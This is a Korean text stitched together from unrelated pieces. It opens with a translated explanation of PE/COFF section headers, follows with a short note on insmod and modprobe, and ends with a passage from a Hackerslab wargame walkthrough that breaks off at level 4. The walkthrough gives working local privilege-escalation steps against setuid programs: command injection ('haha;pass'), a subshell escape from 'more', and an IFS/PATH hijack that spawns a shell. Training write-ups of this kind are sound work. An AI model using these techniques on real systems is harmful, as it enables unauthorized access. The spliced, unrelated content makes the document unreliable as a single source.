PE파일에서는 이 모든 이야기가 틀리게 된다. 필수적인 코드와 데이터로 고려되는 모든것은 완전한 섹션속에 저장된다. 그래서 임포트된 함수와 관련된 정보는 독립된 섹션에 저장되며, 익스포트된 함수 테으블또한 그렇게 된다. 재배치 데이터와 관련된 것들도 동일한 방식으로 처리된다. 프로그램 또는 운영체제에서 필요한 어떠한 코드나 데이터도 그들의 독립적인 섹션을 가지게 된다.
특정 섹션과 관련된 논의를 하기 전에, 운영체제가 다루는 섹션과 관련된 데이터를 먼저 설명할 필요가 있다. 메모리에서 PE 헤더 바로 뒤에는 IMAGE_SECTION_HEADER의 배열이 오게 된다. 배열 항목의 갯수는 PE 헤더에서 알 수 있다. (IMAGE_NT_HEADER.FileHeader.NumberOfSections 필드) 섹션 테이블과 모든 섹션 필드와 속성을 출력하기 위해서 PEDUMP를 사용했다. 그림 5는 PEDUMP의 보편적인 EXE 파일의 섹션 테이블 출력 결과를 보여주고, 그림 6은 OBJ 파일의 섹션 테이블을 보여준다.
Table 4. A Typical Section Table from an EXE File
01 .text VirtSize: 00005AFA VirtAddr: 00001000
raw data offs: 00000400 raw data size: 00005C00
relocation offs: 00000000 relocations: 00000000
line # offs: 00009220 line #'s: 0000020C
characteristics: 60000020
CODE MEM_EXECUTE MEM_READ
02 .bss VirtSize: 00001438 VirtAddr: 00007000
raw data offs: 00000000 raw data size: 00001600
relocation offs: 00000000 relocations: 00000000
line # offs: 00000000 line #'s: 00000000
characteristics: C0000080
UNINITIALIZED_DATA MEM_READ MEM_WRITE
03 .rdata VirtSize: 0000015C VirtAddr: 00009000
raw data offs: 00006000 raw data size: 00000200
relocation offs: 00000000 relocations: 00000000
line # offs: 00000000 line #'s: 00000000
characteristics: 40000040
INITIALIZED_DATA MEM_READ
04 .data VirtSize: 0000239C VirtAddr: 0000A000
raw data offs: 00006200 raw data size: 00002400
relocation offs: 00000000 relocations: 00000000
line # offs: 00000000 line #'s: 00000000
characteristics: C0000040
INITIALIZED_DATA MEM_READ MEM_WRITE
05 .idata VirtSize: 0000033E VirtAddr: 0000D000
raw data offs: 00008600 raw data size: 00000400
relocation offs: 00000000 relocations: 00000000
line # offs: 00000000 line #'s: 00000000
characteristics: C0000040
INITIALIZED_DATA MEM_READ MEM_WRITE
06 .reloc VirtSize: 000006CE VirtAddr: 0000E000
raw data offs: 00008A00 raw data size: 00000800
relocation offs: 00000000 relocations: 00000000
line # offs: 00000000 line #'s: 00000000
characteristics: 42000040
INITIALIZED_DATA MEM_DISCARDABLE MEM_READ[/code]
[color=red][b]Table 5. A Typical Section Table from an OBJ File [/b][/color]
[code]01 .drectve PhysAddr: 00000000 VirtAddr: 00000000
raw data offs: 000000DC raw data size: 00000026
relocation offs: 00000000 relocations: 00000000
line # offs: 00000000 line #'s: 00000000
characteristics: 00100A00
LNK_INFO LNK_REMOVE
02 .debug$S PhysAddr: 00000026 VirtAddr: 00000000
raw data offs: 00000102 raw data size: 000016D0
relocation offs: 000017D2 relocations: 00000032
line # offs: 00000000 line #'s: 00000000
characteristics: 42100048
INITIALIZED_DATA MEM_DISCARDABLE MEM_READ
03 .data PhysAddr: 000016F6 VirtAddr: 00000000
raw data offs: 000019C6 raw data size: 00000D87
relocation offs: 0000274D relocations: 00000045
line # offs: 00000000 line #'s: 00000000
characteristics: C0400040
INITIALIZED_DATA MEM_READ MEM_WRITE
04 .text PhysAddr: 0000247D VirtAddr: 00000000
raw data offs: 000029FF raw data size: 000010DA
relocation offs: 00003AD9 relocations: 000000E9
line # offs: 000043F3 line #'s: 000000D9
characteristics: 60500020
CODE MEM_EXECUTE MEM_READ
05 .debug$T PhysAddr: 00003557 VirtAddr: 00000000
raw data offs: 00004909 raw data size: 00000030
relocation offs: 00000000 relocations: 00000000
line # offs: 00000000 line #'s: 00000000
characteristics: 42100048
INITIALIZED_DATA MEM_DISCARDABLE MEM_READ
각각의 IMAGE_SECTION_HEADER는 그림 7에서 묘사된 것과 같은 포맷을 가지고 있다. 각각의 섹션을 위해서 저장된 정보중에 무엇이 빠졌는지 알아내는 것은 흥미로운 작업이다. 첫째로, PRELOAD 속성을 위한 어떤 표시도 없다는 점이다. NE 파일 포맷은 PRELOAD 속성을 통해서 어떠한 세그먼트가 모듈이 로드되는 시점에 같이 로드되어야 하는지 결정한다.Os/2 2.0 LX 포맷은 8페이지까지 먼저 로드되어야 하는 것으로 지정할 수 있다는 점에서 유사하다. PE 포맷은 이런 유사한 것이 아무것도 없다. 마이크로소프트는 Win32 의존적인 페이지 로딩의 성능을 확신했음에 틀림없다.
Table 6. IMAGE_SECTION_HEADER 포맷
BYTE Name[IMAGE_SIZEOF_SHORT_NAME] 이것은 8바이트 안시로된 섹션 이름이다(유니코드가 아니다). 대부분의 섹션명은 .로 시작된다. (예를들면 ".text"), 그러나 몇몇 믿을만한 PE 문서에서 보면 이것은 요구사항은 아니다. 어셈블리 언어에서는 segment 지시자를 사용해서 섹션명을 지을 수 있고, 마이크로소프트의 C/C++ 컴파일러에서는 "#pragma data_seg"와 "#pragama code_seg"를 사용해서 지을 수 있다. 섹션명이 8바이트를 넘을 경우에는 NULL 종료 문자가 없게 된다는 것을 알아야 한다. 만약 devotee라는 섹션명을 출력코자 할 경우에는, %.8s를 사용해서 추가로 다른 버퍼에 복사하지 않고 출력할 수 있다.
union {
DWORD PhysicalAddress
DWORD VirtualSize
} Misc;
이 필드는 EXE와 OBJ 파일에서 다른 의미를 지니게 된다. EXE파일에서는, 이 필드는 코드와 데이터의 실제 사이즈를 가지고 있다. 이것은 파일 정렬 경계의 배수근처에서 반올림 되기전의 크기가 된다. 추후에 설명될 구조체의 SizeOfRawData 필드는 (약간 잘못된 명칭으로 보인다) 반올림된 값을 가지고 있다. 볼랜드 링커는 이 두 필드의 의미를 역으로 만들었으나 지금은 고쳐진 것으로 보인다. OBJ 파일에서는, 이 필드는 섹션의 물리적인 주소와 관련되어 있다. 첫번째 섹션은 0번지에서 시작한다. 따라서 OBJ 파일에서 다음 섹션의 물리적인 주소를 찾으려면, SizeOfRawData 값에 현재 섹션의 물리 주소를 더하면 된다.
DWORD VirtualAddress
EXE 파일에서는 로더가 섹션을 맵핑해야 하는 곳의 RVA를 저장하고 있다. 메모리에서 주어진 섹션의 실제 시작 주소를 계산하기 위해서는, 이미지의 베이스 주소에 이 필드에 저장된 섹션의 가상 주소를 더해주면 된다. 마이크로소프트 툴에서는 첫번째 섹션의 기본값은 0x1000 RVA로 되어 있다. OBJ 파일에서는 이 필드는 의미가 없으며 0으로 설정되어 있다.
DWORD SizeOfRawData
EXE 파일에서는, 이 필드는 파일 정렬 크기에서 반올림 된 후 섹션의 크기를 담고 있다. 예를 들면, 파일 정렬 크기가 0x200이라고 가정해 보자. 위에서 언급한 그 섹션에 대한 VirtualSize가 0x35A 바이트였다고 한다면, 이 필드는 0x400 바이트가 되는 것이다. OBJ 파일에서는, 이 필드는 컴파일러와 어셈블러에서 종결한 그 섹션의 정확한 크기를 담고 있다. 다시말하면, OBJ에서는 EXE 파일에서의 VirtualSize와 동일한 의미를 가진다는 것이다.
DWORD PointerToRawData
이 것은 컴파일러나 어셈블러가 종결한 바이너리 데이터를 찾을 수 있는 곳에 대한 파일 기반의 오프셋이다. 프로그램이 PE나 COFF 파일을 스스로 메모리 맵하려고 한다면(운영체제가 그것을 로드하는 대신에), 이 필드는 VIrtualAddress 필드보다 더 중요하다. 이 상황에서는 완전히 선형적인 파일 맵핑이 이루어지게 된다. 따라서 섹션 데이터를 VritaulAddress 필드가 가리키는 RVA에서 보다는 이 필드가 가리키는 오프셋에서 찾을 수 있다.
DWORD PointerToRelocations
OBJ 파일에서, 이것은 이 섹션에 대한 재배치 정보를 가리키는 파일 기반의 오프셋이다. 각각의 OBJ 섹션에 대한 재배치 정보는 해당 섹션에 대한 바이너리 데이터 바로 뒤에 따라온다. EXE 파일에서, 이 필드는 (아래에 나오는 필드또한) 의미가 없으며, 0으로 설정된다. 링커가 EXE파일을 만들때, 베이스 주소 재배치와 로드 타임에 해결되어야 할 임포트된 함수를 남겨둔 나머지 대부분의 수정 사항을 모두 수정한다. 베이스 주소 재배치와 임포트된 함수와 관련된 정보는 각각의 섹션에 저장되게 된다. 따라서 EXE 파일이 바이너리 섹션 데이터에 따라 나오는 섹션별 재배치 데이터를 가질 필요가 없는 것이다.
DWORD PointerToLinenumbers
이것은 라인 번호 테이블의 파일 기반 오프셋이다. 라인 번호 테이블은 소스 파일의 라인 번호와 주어진 라인에 대해서 생성된 코드의 주소를 서로 연관시킨다. CodeView 포맷과 같은 현대의 디버그 포맷에서는, 라인 번호 정보는 디버그 정보의 일부로 저장된다. 그러나 COFF 디버그 포맷에서는 라인 번호 정보는 심볼 이름/타입 정보와 분리되어서 저장된다. 일반적으로 단지 코드 섹션(.text같은)만이 라인 번호를 가진다. EXE 파일에서는, 라인 번호는 섹션 바이너리 데이터 다음부터 파일 끝까지 수집되게 된다. OBJ 파일에서는, 섹션의 라인 번호 테이블은 바이너리 섹션 데이터와 섹션 재배치 테이블 다음에 오게 된다.
WORD NumberOfRelocations
섹션에 포함된 재배치 테이블(위의 PointerToRelocations 필드) 안의 재배치 갯수. 이 필드는 단지 OBJ 파일에서만 유효한 것으로 보인다.
WORD NumberOfLinenumbers
섹션 라인 번호 테이블(위에서 말한 PointerToLinenumbers)에서 라인 번호 갯수
DWORD Characteristics
대부분의 프로그래머가 플래그라 부르는 것을 COFF/PE 포맷에서는 속성(characteristics)라 부른다. 이 필드는 섹션 속성과 관련된 플래그 집합(코드/데이터냐?, 읽기가능? 쓰기가능?)이다. 모든 가능한 섹션 속성은 WNNT.H에서 IMAGE_SCN_XXX_XXX형태로 #define 된 것으로 찾을 수 있다. 몇가지 중요한 속성으로 다음과 같은 것들이 있다.
0x00000020 이 섹션은 코드를 포함하고 있다. 일반적으로 실행 가능 플래그(0x80000000)와 결합해서 사용된다.
0x00000040 이 섹션은 초기화된 데이터를 포함하고 있다. 실행 가능하지않은 거의 대부분의 섹션과 .bss 섹션은 이 플래그가 설정되어져 있다.
0x00000080 이 섹션은 초기화되지 않은 데이터를 포함하고 있다(예를들면 .bss 섹션).
0x00000200 이 섹션은 코멘트나 다른 타입의 정보를 포함하고 있다. 이 플래그를 사용하는 일반적인 섹션은 컴파일러에 의해서 선언된 .drective 섹션이다. .directive 섹션은 링커를 위한 커맨드를 포함하고 있다.
0x00000800 이 섹션의 내용은 EXE 파일에는 담겨서는 안된다. 이 섹션들은 컴파일러와/어셈블러가 링커에게 정보를 전달하기 위해서 사용한다.
0x02000000 이 섹션은 프로세스가 한번 로드되고 나면 더 이상 필요하지 않기 때문에 무시될 수 있다. 대부분의 무시될 수 있는 것은 베이스 재배치(.reloc) 섹션이다.
0x10000000 이 섹션은 공유가능하다. DLL과 함께 사용될때, 이 섹션에 포함된 데이터는 DLL을 사용하는 프로세스 간에 공유될 수 있다. 데이터 섹션의 기본값은 공유하지 않는(nonshared) 이다. DLL을 사용하는 각각의 프로세스는 섹션에 포함된 데이터의 자신만의 복사본을 가진다는 의미이다. 좀더 기술적인 용어로 설명하면, 공유 섹션은 메모리 매니저에게 이 섹션의 페이지 맵핑을 DLL을 사용하는 모든 프로세스가 메모리내의 동일한 물리적 페이지를 참조하도록 설정하는 것이다. 섹션을 공유가능하도록 만들기 위해서, SHARED 속성을 링크 타임에 사용할 수 있다. 예를들면,
LINK /SECTION:MYDATA,RWS ...
링커에게 MYDATA라는 섹션은 읽기, 쓰기, 공유가 가능하다고 알려주는 것이다.
0x20000000 이 섹션은 실행가능하다. 이 플래그는 보통 "코드 포함" 플래그 (0x00000020)가 설정될때마다 설정된다.
0x40000000 이 섹션은 읽기 가능하다. 이 플래는 EXE 파일내에 포함된 거의 모든 섹션에 대해서 설정된다.
0x80000000 이 섹션은 쓰기 가능하다. 만약 EXE 파일의 섹션에 이 플래그가 설정되어 있지 않다면, 로더는 메모리 맵 페이지를 읽기 전용 내지는 실행 전용으로 마크한다. 일반적으로 이 속성을 가진 섹션은 .data와 .bss다. 흥미롭게도, .idata 섹션은 또한 이 속성을 설정하고 있다.
또한 PE 포맷에서 제외된것으로 페이지 테이블이 있다. LX 포맷의 IMAGE_SECTION_HEADER에 대한 OS/2의 동치는 파일에서 발견될 수 있는 코드나 데이터 섹션이 있는 곳을 직접적으로 가리키진 않는다. 대신에 그것은 섹션내에 있는 페이지의 구체적인 범위의 위치와 속성을 가지고 있는 페이지 룩업 테이블을 참조한다. PE 포맷은 그러한 모든 것들을 하지않아도 되게 한다. 그리고 섹션 데이터가 파일내에서 연속적으로 저장되도록 보장한다. 두가지 포맷에서, LX가 취하는 방법은 유연성을 허용한다. 그러나 PE 스타일은 작업하기가 더욱 간단하고 쉽다. 두가지 포맷을 위한 파일 덤퍼를 작성해야 할때, 나는 이것을 보장할 수 있다.
PE 포맷에서 좋아진 또다른 점으로 저장된 아이템의 위치가 간단하게 DWORD 오프셋이라는 것을 들 수 있다. NE 포맷에서는, 거의 대부분의 위치는 섹터 값으로 저장되어 진다. 실제 오프셋을 찾기 위해서 첫째로 NE 헤더의 정렬 유닛 크기를 보고 그것을 섹터 크기로 변환해야 한다. (일반적으로 16내지는 512 바이트) 그리고 나서는 실제 파일 오프셋을 구하기 위해서 섹터 크기에 지정된 섹터 오프셋을 곱할 필요가 있다. NE 파일에서 섹터 오프셋으로 저장되어져 있지 않은 어떤것이 있다면, 그것은 아마도 NE 헤더부터의 상대 오프셋으로 저장된 것이다. NE 헤더가 파일의 시작 부분에 있지 않기 때문에, 코드에서 NE 헤더의 파일 오프셋을 사용해야 할 필요가 있다. 대체로, PE 포맷은 NE, LX내지는 LE 포맷보다 다루기가 쉽다(메모리 맵 파일을 사용할 수 있다는 가정하에서)
insmod는 '/lib/modules/커널버전' 의 디렉토리를 뒤져서
해당 모듈이 있으면 올려줍니다.
modprobe는 depmod에 의해 생성된 modules.dep 에서 찾아
모듈을 올립니다. 그리고 해당 모듈에 의존성이 있거나 해당모듈보다
선행되어야 하는 모듈이 있으면 그 모듈도 같이 올려줍니다.
이 부분이 insmod와 가장 큰 차이가 있습니다.
예를들어 vfat이란 모듈을 올리기 위해선 fat이란 모듈이 먼저
올라와 있어야 하는데 fat이 올라와 있지 않은상태에서
# insmod vfat 하면 fat에관한 심벌을 찾지못해 vfat 모듈을 올리지 못하지만
# modprobe vfat 을 실행하면 자동으로 fat을 먼저 올리고 그다음 vfat
모듈을 올려줍니다.
(커널 컴파일시 fat,vfat을 모듈로 설정했다고 가정했습니다.)
modprobe로 해당 모듈을 찾지못하는 경우는 modules.dep에 없을가능성이 크므로
# depmod -a 해서 새롭게 갱신 해주세요.
참고로 의존관계에 있는 모듈들을 한꺼번에 내릴려면 rmmod -r 옵션을
쓰면 됩니다.
- 폐인 -
홍성제
hongyver@hanafos.com
레벨0 -> 레벨1
문제
누군가 우리 시스템에 백도어를 설치하여 두었다. 여러분은 이 백도어를 악용하여 레벨0를 통과한다.
힌트
디바이스도 아닌것이 디바이스 드라이버 무리속에..
풀이
백도어(back door)란 해커가 시스템을 해킹한 후(해킹과정에는 보통 Local attack과 Remote attack이 있다. Local attack이란 해커가 해킹을 하려고 하는 시스템에 계정이 있는 경우 시스템 자체의 버그를 이용하여 해킹하는 방법이고, Remote attack이란 계정인 없는 경우 Protocol상의 문제점이나, 해킹하려고 하는 시스템의 여러가지 인터넷 서비스 설정 버그, 또는 다른 여러 방법을 동원하여 일단 대상 시스템에 침투하는 과정을 말한다.) 다음번에 다시 대상 시스템에 들어가기위해 복잡한 해킹 과정을 거치지 않고 쉽게 해킹할 수 있도록 대상시스템에 만들어 놓은 일종의 개구멍이라 할 수 있다.
일단 해당 백도어가 디바이스 무리속에 있기 때문에 유닉스의 파일시스템에서 디바이스 디렉토리인 /dev로 가서 숨겨진 백도어를 찾도록 한다.
[bluesky@bluestar bluesky]$telnet drill.hackerslab.org
login:level0
password:guest
.....
[level0@drill level0]$ pwd
/home/level0
[level0@drill level0]$ whoami
level0
[level0@drill level0]$ id
uid=2000(level0) gid=2000(level0) groups=2000(level0),9999(hackerszone)
[level0@drill level0]$ cd /dev
[level0@drill /dev]$
이제 숨겨진 백도어를 find 명령을 이용하여 찾아보자(다음레벨로 올라가기 위한 백도어이기 때문에 이 백도어의 user는 level1일 것이다. 현재위치(.)에서 user가 level1이고 group이 level0인 화일을 찾아서 화면상에 보여준다. 결과를 화일로 저장하고 싶은 경우는 find . -user level1 -group level0 -print > file와 같이 해준다.
[level0@drill /dev]$ find . -user level1 -group level0 -print
./.hi
[level0@drill /dev]$ ls -l .hi
-rwsr-x--- 1 level1 level0 12900 Aug 10 15:15 .hi
[level0@drill /dev]$ ./.hi
[level0@drill /dev]$ id
uid=2000(level0) gid=2000(level0) euid=2001(level1) groups=2000(level0),9999(hackerszone)
[level0@drill /dev]$ whoami
level1
[level0@drill /dev]$pass
---------------------------------------------------------------------
[ LEVEL 1 ]
---------------------------------------------------------------------
패스워드 : xxxxxxxx
---------------------------------------------------------------------
레벨1 -> 레벨2
문제
한 어리석은 대학생 서모씨는 Unix C programming 수업시간에 교수로부터 Standard input으로 부터 패스명을 입력받아 그 파일의 종류를 나타내라는 과제를 받았다. 똑똑한(?) 서모씨는 UNIX의 기본 커맨드 중에 file 이라는 유틸리티가 있음을 알고 이를 이용해 숙제를 간편한 방법으로 해결하였다. 그러나 서씨의 방법에는 상당한 보안상 위험이 있다. 이를 이용하여 다음 레벨을 획득하시오
힌트
위 화일의 이름은 딱풀제조 회사명이다.
풀이
이번 문제도 렙0와 마찬가지로 suid(set user id)의 보안상 문제점을 이용하는 것인데, 여기서 suid에 대해 먼저 짚어보고 계속가기로 하자. 먼저 화일접근 권한에 대해서 먼저 살펴보기위해 /etc/passwd란 파일의 권한을 한번 살펴보자.
[bluesky@bluestar bluesky]$ ls -l /etc/passwd
-rw-r--r-- 1 root root 887 Mar 3 01:42 /etc/passwd
위에서 보는바와 같이 /etc/passwd란 파일은 user가 root이고 group도 root이다. 그리고 제일앞이 - 이므로 일반화일이다. 그리고 소유주인 root에 대한 권한부분이 rw- 이므로 소유주인 root는 읽기/쓰기가 가능하고 실행화일이 아니므로 실행부분은 없다. 그다음 group의 권한부분이 r--이므로 group내의 사용자들은 읽기만 가능하다. 마지막 다른 사용자의 권한부분이 r--이므로 역시 읽기만 가능하다. 결국 /etc/passwd는 소유주인 root만 수정이 가능하다.그런데, 우리가 패스워드를 수정할 때 쓰는 passwd란 파일은 사용자로 부터 입력받은 새로운 패스워드를 가지고 /etc/passwd 란 파일을 수정하여 패스워드가 업데이트 된다. 그런데 /etc/passwd는 root만 수정할 수 있는데 어떻게 일반사용자에 의해 /etc/passwd가 수정되어질 수 있는가???
위의 질문에 대한 해답은 passwd(/usr/bin/passwd)의 접근 권한을 보면 확실해진다.
[bluesky@bluestar bluesky]$ ls -l /usr/bin/passwd
-r-sr-xr-x 1 root bin 58306 Apr 13 1999 /usr/bin/passwd
위에서 보는 바와 같이 소유주인 root의 접근권한 부분이 r-s로 되어 있다. SUID 비트가 셋팅되어 있는 것이다. 이렇게 suid 비트가 설정되어 있으면 다른 사용자들이 이 화일을 실행하는 잠시동안은 이 화일의 소유자의 권한 을 가지게 된다. 즉 이 경우엔 root의 권한을 가진다. 결국, 일반 사용자들이 passwd로 패스워드를 수정하는 경우 passwd를 실행하는 잠시동안 root의 권한을 빌려서 /etc/passwd란 화일을 수정하고 수정이 끝나면 다시 원래의 권한으로 되돌아 오게 되는 것이다. 이러한 suid는 위와 같이 매우 유용하게 사용될 수 있는 반면 보안상으로 매우 취약한 약점을 가지고 있다. 그러므로 시스템 관리자는 화면 잠금없이 자리를 비우는 일이 없도록 해야하며, 수시로 아래명령으로 불필요하게 suid/sgid 설정 이 되어있는 화일이 없는지 확인해야 한다. 이제 본론으로 돌아와서..레벨1을 깨보자..
우리가 찾는 딱풀제조 회사명을 검색엔진으로 찾으면 amos라는 것을 알 수 있다. 이 화일을 실행하면,
[level1@drill tmp]$/usr/bin/amos
path?/usr/bin/amos
/usr/bin/amos: setuid ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked
(uses shared libs), not stripped
그런데 여기서 다음과 같이 입력해보자..
[level1@drill level1]$ file /usr/bin/amos
/usr/bin/amos: setuid ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked
(uses shared libs), not stripped
여기서, 우리는 똑똑한(?) 서모씨가 이 amos라 프로그램에서 path?로 입력받은 화일명을 file 이라는 유틸리티의 입력으로 주도록 했다는 것을 알 수 있다. file이라는 유틸리티는 입력으로 들어온 화일이 어떤 형태의 화일인지를 알려주는 유틸리티이며 사용법은 [$fille 화일명]이다. 그런데 /usr/bin/amos의 접근권한을 보면 아래와 같이 suid 비트가 설정되어 있고 user가 level2인 것을 알 수 있다.
[level1@drill level1]$ ls -l /usr/bin/amos
-rwsr-x--- 1 level2 level1 13423 Aug 10 15:15 /usr/bin/amos
그러므로 이 amos를 실행하는 동안은 level2 사용자가 되는 것이다. 그런데 여기서 또 한가지 알아야 하는 것은 유닉스에서 두가지 명령을 하나의 라인에서 같이 줄 경우 아래와 같이 ; 으로 분리한다는 것을 알아야 한다. 즉, 다음과 같이 할 경우
[level1@drill level1]$ ls;ls -l
Mail public_html tmp
total 5
drwxr-xr-x 2 root root 1024 Aug 10 14:39 Mail
drwxr-x--x 2 root level1 1024 Aug 10 15:14 public_html
drwxrwx--T 2 root level1 3072 Jan 10 05:00 tmp
ls의 결과를 보여주고 바로 다음 명령인 ls -l의 결과를 보여준다. amos 실행후 path?에서 haha;pass 라고 입력해주면 어떻게 되겠는가?? [level1@drill level1]$file haha;pass 라고 입력하면 다음의 명령이 level2의 사용자 권한으로 실행되는 것이다. 즉, file haha를 실행하고 pass를 실행한다. file의 인자로 넘어간 pass까지 완전히 실행이 끝나기 전까지는 level2의 사용자로 실행되고 있는 상태(amos가 suid(level2)가 설정되어 있기 때문에)이기 때문에, file haha를 실행하고 haha란 화일이 없을 것이기 때문에 에러 메시지를 출력하고 바로 pass(운영자가 만들어 놓은 스크립트로 shell 사용자의 패스워드를 화면상에 보여준다.)를 실행하여 레벨2의 패스워드를 보여준다.
[level1@drill tmp]$/usr/bin/amos
path?haha;pass
---------------------------------------------------------------------
[ LEVEL 2 ]
---------------------------------------------------------------------
패스워드 : xxxxxxxxxxxx
---------------------------------------------------------------------
레벨2 -> 레벨3
문제
유명한 비비에스 프로그래머 김모씨는 자신의 bbs를 운영하던중 회원들이 로긴하기 전에 특정 내용이 담긴 경고 메시지를 보여주고 싶었다. 그러나 불행하게도 경고 메시지의 크기가 한 페이지를 넘어가는 바람에 회원들이 이글을 제대로 읽을수가 없었다. 고심하던중 김모씨는 more를 이용하면 간단히 해결 된다는 사실을 알았다. 그러나 그 방법은 상당히 위험한 문제가 남아 있었다. 이를 이용하여 다음 레벨을 획득하시오.
힌트
...
풀이
이번 문제는 more 커맨드의 보안상의 취약점을 알아야 하는 문제이다. 우선, $find / -user level3 -group level2 -print 명령으로 김모씨가 경고 메시지를 보여주기 위해 만든 스크립트 화일을 찾아서 실행해보자
[level2@drill level2]$find / -user level3 -group level2 -print
/usr/bin/alert
/usr/bin/alert.txt
[level2@drill level2]$ls -l /usr/bin/alert
-rws--x--- 1 level3 level2 12873 Aug 10 15:15 /usr/bin/alert
[level2@drill level2]$ls -l /usr/bin/alert.txt
-rwx------ 1 level3 level2 247 Aug 10 15:15 /usr/bin/alert.txt
위에서 보는 것처럼 이 alert도 역시 level3로 suid 비트가 설정되어 있다는 것을 알수 있다. 즉, 이 alert를 실행중에는 level3 사용자가 되는 것이다.
[level2@drill level2]$/usr/bin/alert
이곳은 당신에게 악영향을 끼칠 수도..
좋은 영향을 끼칠 수도 있습니다..
....
--More--(54%)
아직 명령 실행이 완전히 끝난 상태가 아니므로 아직 level3 사용자이다.
여기서 이제 more 커맨드의 보안상 헛점에 대해 알아보자... $man more 해서 more 커맨드의 사용법을 보면,
[bluesky@bluestar bluesky]# man more
MORE(1) UNIX Reference Manual MORE(1)
NAME
more - file perusal filter for crt viewing
SYNOPSIS
more [-dlfpcsu] [-num] [+/ pattern] [+ linenum] [file ...]
.....
COMMANDS
Interactive commands for more are based on vi(1). Some commands may be
preceeded by a decimal number, called k in the descriptions below. In
the following descriptions, ^X means control-X.
.....
!< cmd > or :!< cmd >
Execute in a subshell
.....
위의 man 화일에서 볼 수 있듯이 more 실행중에(실행이 아직 끝나지 않은 상태) 서브쉘을 띄워 유닉스 명령을 실행할 수 있다. 그러므로, 위의 --More--(54%) 상태에서 !pass라고 입력해주면 level3 권한으로 pass를 실행할 수 있게 된다.
[level2@drill level2]$/usr/bin/alert
이곳은 당신에게 악영향을 끼칠 수도..
좋은 영향을 끼칠 수도 있습니다..
....
--More--(54%)
!xxxx
---------------------------------------------------------------------
[ LEVEL 3 ]
---------------------------------------------------------------------
패스워드 : xxxxxxxxxxx
---------------------------------------------------------------------
레벨3 -> 레벨4
문제
항상 약속을 자주 잊어버리는 서모씨는 번번히 주위로부터 원망을 산다. 서모씨는 고심하던중 자신이 매일 아침 리눅스 서버에 로긴한다는 사실을 알고는 매번 로긴할 때마다 오늘의 날짜를 알려주면 편리하겠다는 사실을 알았다. 그래서 date 커맨드를 이용하여 오늘의 날짜만 yyyy-mm-dd 형식으로 간단히 출력해주는 프로그램을 씨 언어를 이용해서 프로그래밍하고는 누가볼까 두려워 특정 디렉토리에 꽁꽁 숨겨 두었다. 이를 찾아서 다음 레벨을 진입하시오
힌트
...
풀이
이번 문제는 IFS(Internal Field Separator)의 헛점을 이용한 해킹이다.
IFS는 유닉스에서 외부프로그램을 실행할 때 입력되는 문자열을 나눌 때 기준이 되는 문자를 정의하는 변수이다. 기본적으로 IFS는 공란(Space)으로 정의된다(IFS=" "). 이 IFS를 슬래쉬(/)로 바꾸고 싶다면 csh인 경우는 setenv IFS /, bash인 경우는 export IFS="/"로 하면 변경된다. 먼저 find 명령으로 서모씨가 꽁꽁 숨겨놓은 화일을 찾으면 /usr/man/pt_BR/man8/today라는 것을 알 수 있다.
이를 실행하면 01/10/00과 같이 표시되는데 이로써 우리는 today가 유닉스에서 날짜를 보여주는 명령어인 /bin/date를 실행하도록 프로그램 되어있음을 알 수 있다. /usr/man/pt_BR/man8/today의 접근 권한을 보면 이 역시 level4로 suid 비트가 설정되어 있다는 것을 알 수 있다. 이 사실과 위에서 말한 IFS의 보안상 헛점을 이용하여 어떻게 level4의 패스워드를 알 수 있겠는가??
/usr/man/pt_BR/man8/today를 실행하면 /bin/date를 실행한다. 즉, /bin디렉토리를 찾아서 그 아래의 date란 화일을 찾아서 실행하는 것이다. 그런데 우리가 IFS를 /(slash)로 바꾸면 어떻게 되겠는가?? today를 실행하면 /bin/date를 실행하는데, IFS를 /로 바꾸었기 때문에 shell은 /bin/date -> bin date로 인식하게 된다. 즉, 현재 위치에서 bin이란 화일을 찾아서 있으면 이를 실행하게 될 것이다. 그러므로 우리는 today를 실행하는 현재위치에 bin이라는 스크립트 화일을 만들어 그 안에서 /bin/sh를 실행하게 되면 level4 사용자 권한으로 sh(shell)를 실행하는 결과가 되므로 level4의 shell이 뜨게 될 것이다.
아래 그 과정을 보여준다.
[level3@drill level3]$find / -user level4 -group level3 -print
/usr/man/pt_BR/man8/today
[level3@drill level3]$ cd tmp
[level3@drill tmp]$
[level3@drill tmp]$ ls -l /usr/man/pt_BR/man8/today
-rws--x--- 1 level4 level3 13245 Aug 10 15:15 /usr/man/pt_BR/man8/today
[level3@drill tmp]$ln -s /usr/man/pt_BR/man8/today today
[level3@drill tmp]$ls -l
lrwxrwxrwx 1 level3 level3 25 Jan 10 10:36 today -> /usr/man/pt_BR/man8/today
[level3@drill tmp]$./today
01/10/00
[level3@drill tmp]$cat > bin
/bin/sh
^D
[level3@drill tmp]$chmod 755 bin
[level3@drill tmp]$ls -l
-rwxr-xr-x 1 level3 level3 10 Jan 10 10:38 bin
lrwxrwxrwx 1 level3 level3 25 Jan 10 10:36 today -> /usr/man/pt_BR/man8/today
이제 여기까지 IFS를 /로 바꾼후에 실행할 bin 이라는 스크립트를 /bin/sh란 내용으로 만들어 실행가능 permission을 주었다. 이제 실제로 IFS를 /로 바꾸고 today를 실행시키자...
[level3@drill tmp]$IFS=/
[level3@drill tmp]$export IFS
[level3@drill tmp]$PATH=.:$PATH
[level3@drill tmp]$,/today
bash$pass
---------------------------------------------------------------------
[ LEVEL 4 ]
---------------------------------------------------------------------
패스워드 : xxxxxxxxxx
---------------------------------------------------------------------
레벨4 -> 레벨5
문제
리눅스에 들어있는 게임을 종종 즐기곤 하는 김모씨는 하도 심심하여 게임의 소스파일에 특정코드를 삽입하여 다시 컴파일 하였다. 김모씨가 왜 그랬는지 이해하는 사람은 아무도 없었다. 아무튼 여러분은 김모씨의 어리석은 행위를 이해할 필요는 없고 이를 이용하여 다음 레벨을 획득하면 된다.
힌트
어줍잖은 김모씨는 단 한줄만 소스에 추가했다고 한다.
풀이
find 명령으로 찾아보면..김모씨가 하려고 했던 게임이 /usr/games/trojka라는 것을 알 수 있다.
이를 실행해보면...김모씨가 소스에 추가한 한줄을 대충 짐작 할 수 있을 것이다..바로../usr/bin/clear를 실행하도록 한줄을 추가했다는 것을 알 수 있다. 그리고 이 trojka 역시 level5로 suid 비트가 설정되어 있다...그러므로 우리는 trojka를 실행할때 실행하도록 한 clear를 /usr/bin/clear가 아닌 우리가 만든 clear로 대치하고 clear 속에 level5 쉘을 띄우면..렙5의 패스워드를 알 수 있을것 같다.
[level4@drill level4]$cd tmp
[level4@drill tmp]$ find / -user level5 -group level4 -print
/usr/games/trojka
[level4@drill tmp]$ls -l /usr/games/trojka
